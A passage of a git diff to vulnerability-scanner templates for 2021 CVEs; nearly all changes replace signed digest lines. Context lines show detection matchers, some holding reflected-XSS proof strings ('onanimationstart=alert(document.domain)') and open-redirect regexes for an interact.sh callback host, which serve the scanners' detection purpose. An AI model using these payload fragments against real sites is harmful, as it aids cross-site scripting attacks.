4a0a0047304502205e43f186f7f985038ba2aa39cd643496cc603ab2946c157e5ec07066171749570221009e08ecab2658912944aafa0b62ef9a344db5136c7566d6bbd62d3a82208cf8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009cb71b7ff48991f094e6b839fa2f22dee11b386b0f6ef196ebebf959eb62734602201329502c38c3ca6abec27207b9221dd6bcb23187b41d6d81997afd89960bb816:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index bd384a0a00d..a05be4ca400 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a498da70927094154a7d36775624b2971eceb17d1e4a6f59297f8c31bab6fe64022100d47cf8d89f2b368563d275b681fa0e01002b64bb087260eb7b71e4e11741fb2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6722a9999e417674ea18f690142e3472143c3bb88dc9aa0dd7f98f3f0e3fc88022100cdbcaef82a0e5d2db437ef3196715d6d44f5dd5e58915bcabb47ef588a202ab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24956.yaml b/http/cves/2021/CVE-2021-24956.yaml index dd21fc3a89c..06a2ae58610 100644 --- a/http/cves/2021/CVE-2021-24956.yaml +++ b/http/cves/2021/CVE-2021-24956.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207639489d0d2e6e5d6b9cff10e4cf41df43562b6a6d9282fe9ef1c97730f2479d022000952cc6dc10a960fdf0b4425bc503bda558df9a9e5ab7feb941ee8f4e976a64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec7c73a4700770a6f8cd69cb7a267a4c4576a7e951c2ce0349647ba8e35c22d802206f9532d61ac4798d6f681393ef221aa9f8ec06baefd51e6048a781ef7a9f41d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index da5632386fc..9d151fc8320 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Hello world!")' - 'contains(body_2, "Welcome to WordPress")' condition: and -# digest: 4a0a00473045022038926afa0619bbf84838b092063422d9a7fc3ddc751d55c5e37955632d4cc4d0022100d9b889c2305fb52bf4ca3bf318c7bf59e7b0b36a063f3e82e00ee81f1d8f58e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f703fe68c2cf96652156617f32f234737c949726758cb498659c3a13f58dd882022100abeb744d9bb7ef04b08fd9b61185f001f93bab1f6ade2b767718f64c9d74ec05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 2d944f846a2..82dc09901b7 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' condition: and -# digest: 4a0a00473045022100f34fec0aee915bd474a5fd058e8273139e7c3a31455131a7beb9f82930bf3b4502205c7601dee56234b6bd3d1adede67527594ae5daf954d911e61507f4bbeaf88ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205059891774166cc0257ae7bb23eaca8701326332a2fcd36a9a3c989d2e3e6fd00220596919195aad4a7cdc14c6d9646bf73f70383aba3756d615dcec44b7d5fd62b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24987.yaml b/http/cves/2021/CVE-2021-24987.yaml index bf790def001..f794d332d65 100644 --- a/http/cves/2021/CVE-2021-24987.yaml +++ b/http/cves/2021/CVE-2021-24987.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008230813a3ca561b98b27de82cfe70e54b2501d9e6804fc1eedf6ced996aa7489022100c562e88c718f08b97530253c221840d1bbd4994a56f81108f590e2975d7a9e5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022052d6cdd7da3f77f1ea259a874dbdbcfa047d3f1fa996d7b8d1f405bf87ebbecf02203c6e9444f98203151be258fd0adecf328657e80f7ec28e63ccbbf1fa0b32bf86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24997.yaml b/http/cves/2021/CVE-2021-24997.yaml index 91f002647a1..8fe24b703ba 100644 --- a/http/cves/2021/CVE-2021-24997.yaml +++ b/http/cves/2021/CVE-2021-24997.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100adf0707841bf4c1a13e179aef591fdd79a644d2af4c85d35ea2723b02da0cad1022059352f05337ff76a69475162a1354dc74f74c7caca2d64a1a63b363c50cfa8a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae38a8bec0caec3391ec3c4df5b41163d936b030012e7c4cbfc0bce99025e88a0220278cdf5737e3c4e06a9375e74e19d6f74c8722df53b3b883821c262a08570614:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 88ebffd64a0..f4a5388ccd6 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ec67e0871a4f0edbc4d117e3b416c96e1cfbee31121f247d92694ae2d1f7b1ac022052b18a8449a927f749e85f6961c2cf3917065ec207549b6c8c8a940815a15884:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b885a3f318423ce0265db9291f0ead4e9812c1a9baf3930ad50c3450b19e0898022100efe630d781fc0c0e32d218d97d86bff5a6b9c258385c086f27008ba85b2665ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index e9c39af65f2..0cf56173b30 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f95d7227ac549412f0e09a0d9d5cbe940ee337ccb0e037156695489cc1a4a9e02206259e7790a4a28233a993c61ded04aa4d80cbcded7b17c4c22eafed44278f5ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a978275b6dd5b402839fc7c93220916054b8aee56b36d4d54ffb9a1fd87357fe022100e18c923571e16fd53c965d0d4fba58a02851892f24af7ecfd321fc941b2959b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25028.yaml b/http/cves/2021/CVE-2021-25028.yaml index 5b335d8e7bb..82ae1c3a9fd 100644 --- a/http/cves/2021/CVE-2021-25028.yaml +++ b/http/cves/2021/CVE-2021-25028.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100f29fccaaddfd0f29c318ca2ee46d12d13537180641b1a2f8774bb79f15dfae73022100c0698652603b4884e465741d94988cf094db96bdcfcf2d75dc68aa748e54d81c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e003154619581c99a63213381fdb862472efce04f5524551406f790d8886a282022100e76d3661bd27d9b056c5bd35786bd8729cce9aeff24797bfba3127f380ad2484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25032.yaml b/http/cves/2021/CVE-2021-25032.yaml index 6c66c0eadee..cc442359b04 100644 --- a/http/cves/2021/CVE-2021-25032.yaml +++ b/http/cves/2021/CVE-2021-25032.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210086110264c8f67df5cb3129cede1bf9ef8d159645d8647b0d39168635eab965d4022100b8f9c0c877ea40a4b5253669e43564057f4add49303f8ccdd8a154e7d3daa24b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200e6edaf6ce1110d5c7cfcf3fa7e0ba18a36fa65e0e38e495a66cbefc636d9199022100b72111b125661b5da763469512905366029656ced058e1fb06d4fe0220834d15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index cbaa19ad163..538fef5733f 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502202ef0b6e20f55172e74292ad70d4ff79c3bf3477b42c0ca6ca2bcd97212b82e77022100ed8fc8111531722b96a7a14449b46667c7e7aa2339904993d49e2457b71033fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220639314e5c082876ba3bf220f648abbfc7cb611df466e813dfcc44ce50d3c9f040221009aabb3478e2b8ffb169c4c1a7ee24c5dcd2bc4ce055c1eee997465f76d2243bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25052.yaml b/http/cves/2021/CVE-2021-25052.yaml index 30568051135..45b4315176d 100644 --- a/http/cves/2021/CVE-2021-25052.yaml +++ b/http/cves/2021/CVE-2021-25052.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e5f7e988b6880899649a4743e6269cd69c7ec7740df1c0334c350ca767c1a0502201b67263b6140bdf9a4e976e731c62a5844f69b658e0cedd69fa8274a186bbbae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d291aa1403c97daa8d3f5e78f6dd0d4661560b34335e3f01d4e1f5cfaabe73c4022100a5bbb4d0755daa960642d94fde4bc2f5c08b4957f99710a8817bfa955512ba00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25055.yaml b/http/cves/2021/CVE-2021-25055.yaml index 0c46c45d6e4..09427b11d47 100644 --- a/http/cves/2021/CVE-2021-25055.yaml +++ b/http/cves/2021/CVE-2021-25055.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c165abee2d8b928c3e7e67762aebf03e3ee1b8df52c456b6212518f3feb6528602210080e73268ebf749bb7abdf6ad77a4b59be569e40bb33d19db726e446e9034b0b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8d8046bd1454166bee6f404db5f5e74071eccb8ca89e0ccd8a7b30e5e6288e0022100f2468430ebad44537bd93b994d22e626123ee82ff5ef105d6c7491c5c58c5ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25063.yaml b/http/cves/2021/CVE-2021-25063.yaml index db625b6eedd..93679f8118a 100644 --- a/http/cves/2021/CVE-2021-25063.yaml +++ b/http/cves/2021/CVE-2021-25063.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008e19da79899df685af26fc16a0b072a3ba247775d48f2992f99b259bc9a4435102206976677f0602d77277282a7e8899d553e958e996b9d2ae4ceb98f250c4eb00f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ff9a29ea5c2f5b4e5d572632fe9c578b083232b4ccb81bb76b63ce17ea81fbd022100e856438561776e4072092694e905272975b4974e93a246d125c3115ec239880e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25065.yaml b/http/cves/2021/CVE-2021-25065.yaml index 3cf75bcc112..050008ed50f 100644 --- a/http/cves/2021/CVE-2021-25065.yaml +++ b/http/cves/2021/CVE-2021-25065.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "custom-facebook-feed")' condition: and -# digest: 4b0a00483046022100b72c3fe060a15d71d820ca9a7c5b2dcd38ae062fb7dac66b1f7250eb54b87ef2022100feb0d201c9e4c03e5e4a8526cd34e762e2555cdee1c6e8373dd5805a4256574a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c6b48dba939e6e3813485ecee88cbf6516461ff31976d74f5bcef21dd02b76b02205ec521aefc438954f21733b7fa4729e40e626757fa53c56c21639ae123440c43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25067.yaml b/http/cves/2021/CVE-2021-25067.yaml index bdad9e4586a..5cedcad6acc 100644 --- a/http/cves/2021/CVE-2021-25067.yaml +++ b/http/cves/2021/CVE-2021-25067.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")' - 'contains(body_2, "Enter Page Title")' condition: and -# digest: 4a0a004730450220116c687fb25f758148429ceaa1c56c5ecf85fd6e98eba0c0e3825fd8e38ea9c9022100bd0e5d024da1c05010a50ffc36b2f11919878105c0315c1df9d7caf2b31f7620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220737ce05aa09ad13a3c191f95d80a1ee396b5cac47149d832a20c0d8067778cae022048405ae1ab540a007792b2a9f49f924fc6e90abaea13289e87de6ff9dada2c79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25074.yaml b/http/cves/2021/CVE-2021-25074.yaml index 0f1fb8565d1..d44b8f0f89f 100644 --- a/http/cves/2021/CVE-2021-25074.yaml +++ b/http/cves/2021/CVE-2021-25074.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100fcab07bd5baaf19ea29d3af5d97ad8804827133606c7aa794dc2744cc98f9e13022100eaddf4001da926eeb87c17657a24939d92280a0744cbf55e5da5962066f5a9b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fabd390ea30ae373232b6cc6e6e52a5fce386d70cac3638afabef72b9c93c2bb0220264f777841933c113abd2083c09153d33cbceab1828e8cc1c8c15ec833670658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25075.yaml b/http/cves/2021/CVE-2021-25075.yaml index 868d9ccfa8a..4c05f344d9b 100644 --- a/http/cves/2021/CVE-2021-25075.yaml +++ b/http/cves/2021/CVE-2021-25075.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffdf1153aacbcf4e1666f7f7ec79c7fff438aa1a5207daf701372205b85a99a602201bce815b0f62ab9351a0f3e7994efeee3006f18a031ff8bca917a4556a31770f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070d6466cd2b27771992205a5af459e091cb960a18714431551f9e736fef7954d02201cffee3fc75923c63a8b887cf1849f5b764cebadbf6a65d9f4064ef220b0801b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25078.yaml b/http/cves/2021/CVE-2021-25078.yaml index f703fd5e0a2..935d186df91 100644 --- a/http/cves/2021/CVE-2021-25078.yaml +++ b/http/cves/2021/CVE-2021-25078.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_3, "")' - 'contains(body_3, "Affiliates Manager Click Tracking")' condition: and -# digest: 4a0a0047304502201e9f497b07cf70d5fac9c5d44a8ce3696bacc1cb03d99895514eed6c97225dee022100e9a247a4e8b38bc04d0519e3a4c78ddcafa1bc7ef4f886a3007b8b66b7d630fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a8b367b9ced52dba5735904c8a47460a8e974943cf139d0b17b75c5eae8dd2d40220479d124bc999a20be6d2b7f3e511271dcb1db00069d9ec1dbefe6ca2bdafde9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25079.yaml b/http/cves/2021/CVE-2021-25079.yaml index 2e4d0810b4f..a3ebf403cf0 100644 --- a/http/cves/2021/CVE-2021-25079.yaml +++ b/http/cves/2021/CVE-2021-25079.yaml @@ -50,4 +50,4 @@ http: - 'contains(header_2, "text/html")' - "contains(body_2, '') && contains(body_2, 'contact-form')" condition: and -# digest: 4b0a00483046022100c5a955d8460c904f4ac7e065cdd77585c7f190e39800aa1bd54423fbce5caf7e02210088a94b09a2c6c1266f12d9500c8eed8efea72d3ec4f3b7340dc830fcdf33bb24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210093dc0ad79c2a27eb555a6d6eba161e29affd4d1109764aa9aedc09ac24efa05002203dc6ea7b11120583e1e19c9b4fb7b76822fe8e2e38e2a1900c95beee9fa99852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25082.yaml b/http/cves/2021/CVE-2021-25082.yaml index 370a516cdc3..85102e56aca 100644 --- a/http/cves/2021/CVE-2021-25082.yaml +++ b/http/cves/2021/CVE-2021-25082.yaml @@ -140,4 +140,4 @@ http: - status_code == 200 - contains(body, "{{marker}}") condition: and -# digest: 4b0a00483046022100c9b5194fdca4710788b9fa49b9875916f4822f8b3f93bc474ebc21445007049b022100ea566b2c7782ed023d3e4d02883aa3c56a1ae9e78cf43dc7155954cdfcf677db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b98ed7ef54410429e56d5f8dda20cc37bd0241b8eeaca89bd324fdb6c8bf2de4022100f16797c43fb7b2e0d7a38357673c9f97bcbe2ce252176291f3ddd3d09caa86a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25099.yaml b/http/cves/2021/CVE-2021-25099.yaml index 874cbc9250a..1c5ebad3729 100644 --- a/http/cves/2021/CVE-2021-25099.yaml +++ b/http/cves/2021/CVE-2021-25099.yaml @@ -49,4 +49,4 @@ http: - 'contains(body, "")' - 'contains(body, "give_user_login")' condition: and -# digest: 4a0a00473045022100f73f45c6bf09054dd2ba021ff7f8e026d3296bffa0b19dd2aff3e4c075562d1b0220151f85f42a1554176b26eb85b6457f331a6140a4bf708d5fa830b7c59de76243:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c36c8225a97d03ec51f37a246f388da1e35018881a8c06977e02dcee3adbca230220367d280c0800b592eeaf31773a62190b223d52d68bb07ff2c67008493b00e800:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25111.yaml b/http/cves/2021/CVE-2021-25111.yaml index 2ea5c1f2a40..e50e9385eaf 100644 --- a/http/cves/2021/CVE-2021-25111.yaml +++ b/http/cves/2021/CVE-2021-25111.yaml @@ -38,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100aa7db4d6b5fedb01cc1ead7a831945f9148b0aae2c8a651d054dc3544948055e022100ebad2f9a2bc4957c665356b49f8a668a64f607bd09b0019790ea55453a20b2b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220364bc4f331b5eb36a027f04abdb22324949eb19f2ad215a0d7adbc2d39bfbabc0220301307b05f1bbbdf0a75a737b420936c6dc4d801625c777e3de3e8d973672855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25112.yaml b/http/cves/2021/CVE-2021-25112.yaml index 7f090e81dfa..7ba49645a2e 100644 --- a/http/cves/2021/CVE-2021-25112.yaml +++ b/http/cves/2021/CVE-2021-25112.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a319bf9dd90f6ee4b31451bbb092a1eddf69437693954b3726aded9992d13b4022100881faafba9cfbb14bfc157211b94f0ffa7ba101e0dd555e6396fca9b6a963a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022006266b959565020ccd2028fe42b523a0f530a180c6d029dedd7ac5ed278a9cd1022100e3278b35612e20b2bf9f7d41a6d74595f4d7d31b2077426978d3ed51a17e5b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25118.yaml b/http/cves/2021/CVE-2021-25118.yaml index 159a36800fe..db007a303fe 100644 --- a/http/cves/2021/CVE-2021-25118.yaml +++ b/http/cves/2021/CVE-2021-25118.yaml @@ -55,4 +55,4 @@ http: regex: - '"path":"(.*)/wp-content\\(.*)","size' part: body -# digest: 4a0a004730450221008c0066864235ac5fba28d07569124caf5c152cccdc403e56c02842189500bc1502206449a6d196ead8586fd0801b526e6977c2a1c402bb60ea60be1a170cce05e6b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073575b492305bebd8383a80c89937e798f8a8f8889b889ea46529e67e2e5f32a022009a1cf3a82351c6cd10cabb7c6400969ad7449cbc456e5d40621bdf7bca1e44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25120.yaml b/http/cves/2021/CVE-2021-25120.yaml index 968fcf2fb81..2e29731ef71 100644 --- a/http/cves/2021/CVE-2021-25120.yaml +++ b/http/cves/2021/CVE-2021-25120.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a795538ba51c76ab54b654405bb76b783e62172c02df18634080d2a69924185d02201d83c90facfbbd7e7d949a8a93f9308ca60e304f55c6e2daed887033f82875b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203cbd68a5fec8f0497824a1111313407184be3549d7b266bd1905131a45d959f8022100ac58fa31993bc080763aa73ed877a7f66be5c150b137482e8f16da0937c790c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25161.yaml b/http/cves/2021/CVE-2021-25161.yaml index f9192a9bf92..f9494a8f5de 100644 --- a/http/cves/2021/CVE-2021-25161.yaml +++ b/http/cves/2021/CVE-2021-25161.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200f0a60ba32e9be42f69573fbe42ec2f7cb60b58092d45f3b2fe36969168854a502201993fb55ebbc36dfc2432f3e8df5972e11d1575898d8cb0d8c95562ff8365834:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c866614e246901df2613dea55ce6c3cc28ae17654ca3ecaf2258cc28f95004320220773fad085827c4d9f139463392118fe780df84aac3ed4fb0f62b71d13f07eab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index f31c976e061..e4478fc4598 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -94,4 +94,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220467688ce239208afbb3eae1889032e34e052859220b3c22bcdaac851c0375b5b022036bc97da08a7dcceb48a2b144aa7e34211e34ec4d5e3e71314caff33363348c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f48572271445cbde321bc1007865e19da4c5d9a1eb06b14e0be0a1cc58e813c30221009aee19b8ac2a25c7327d69bba2d7cd638306328c008654f4a6a9cf216f1f1cf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index 2be818080ad..6b16c4fc0bc 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b41b3538d813d7fd7345ba659e093e5ccef158c2291aca4915ccdcd47f83104022100e22c18db8d9bdd5c53868e80ea1b23a157952272c1f4985eba8178ade89bd7b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203d4bd6960cf585ac662376f3a574e354594b41090cbf010fc5570e901f5a8359022100a19bc06b4407b548c68d86dcc746254c98d270bc2b3160a3b2a08dc9493349b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26599.yaml b/http/cves/2021/CVE-2021-26599.yaml index 818b57c7479..c1eeeacad69 100644 --- a/http/cves/2021/CVE-2021-26599.yaml +++ b/http/cves/2021/CVE-2021-26599.yaml @@ -61,4 +61,4 @@ http: - status_code==200 - contains(body, "array(1) {") condition: and -# digest: 490a0046304402205141b4cb23840b60083264408f72b4cbe41207b079c484b8bf7208420522323e0220188b4a4a8ed6c03f402cd5efaaea5e11e3c59971fd2795c24a4ef62c967e3a52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085d2cf7f4630e99953e2c41fb11dc647f47659e24ba32cd20f57c8d91adf6ca4022100a899fdb0f859c30a480b751fbe621c526fdf4556f45cedecd3a7985759b60a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26702.yaml b/http/cves/2021/CVE-2021-26702.yaml index 85fad1cc29f..ad501223658 100644 --- a/http/cves/2021/CVE-2021-26702.yaml +++ b/http/cves/2021/CVE-2021-26702.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202975139a592bfb9ecd1b8e85210f03b8592e16e7673258988f00bee862e9fcf9022005dcd7ee1dd4a1e70da8d8de4b5fdc226142fa561b3db704475ce7744531c68b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed15c43005936298e1a5600c1fb1767b81576e1e43c3196ea5d53bdb201668ed022100f37992c96d7e55c362505455afd9f83345bb43271b56e9d08948e61e941bbe07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26812.yaml b/http/cves/2021/CVE-2021-26812.yaml index c990a43fbed..0a6ce9a4a90 100644 --- a/http/cves/2021/CVE-2021-26812.yaml +++ b/http/cves/2021/CVE-2021-26812.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e08a36b4395a39ad6b208056ff91595adcd0db67e5514a545cd827193725cfb022100c9f0e94da5d1bba4fc5410a6cf7239ba0b50af4a13d7b6a0f997d079d722660b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011ae1891d2c0d8b55f5f84499952c0212238067fceba0647bb57e333dd9c81ac02204006b85ae2c4800c9b45a7fa24ed7d552110a52b6300cdcab1ebb55793682e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-26855.yaml b/http/cves/2021/CVE-2021-26855.yaml index 8f82dfcc7bc..488d1d81f18 100644 --- a/http/cves/2021/CVE-2021-26855.yaml +++ b/http/cves/2021/CVE-2021-26855.yaml @@ -49,4 +49,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100a01ff097a1ff2d46e78152618c6b92f4c35658ed0d96c157bed1571905003cfd02200979583ec1ef58693192c38630611fa6ad68f92cbdede08ae823fc933ac9d1ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fce71d1332a5672221e8db077969ca8cc12fbcbe86c3a28081363c02e32e9c6c022049aa2cc1154cf0ec5c8c104b96d07a767dddf3ddd1a09498a63ce169341af198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27124.yaml b/http/cves/2021/CVE-2021-27124.yaml index 3c176aa81bf..306a349647a 100644 --- a/http/cves/2021/CVE-2021-27124.yaml +++ b/http/cves/2021/CVE-2021-27124.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008527469149b7e64f1579639a9e4e735cdaac0638125c4e87d9dc17b5fcfff8f102210094bad0988cf7ac57d335551ef8a33f3de72ea0a282b60ae4554276d17a67665d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a988e9cd5b00f1c8464587f840c83e8deb79abeec3e63beefbb852af365b7d83022100bc168e7a9b7275dc287daced1ea12d5a4e79d91a2869dbdba576615abebc14c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27132.yaml b/http/cves/2021/CVE-2021-27132.yaml index b72d01ab6a1..45ed30145b6 100644 --- a/http/cves/2021/CVE-2021-27132.yaml +++ 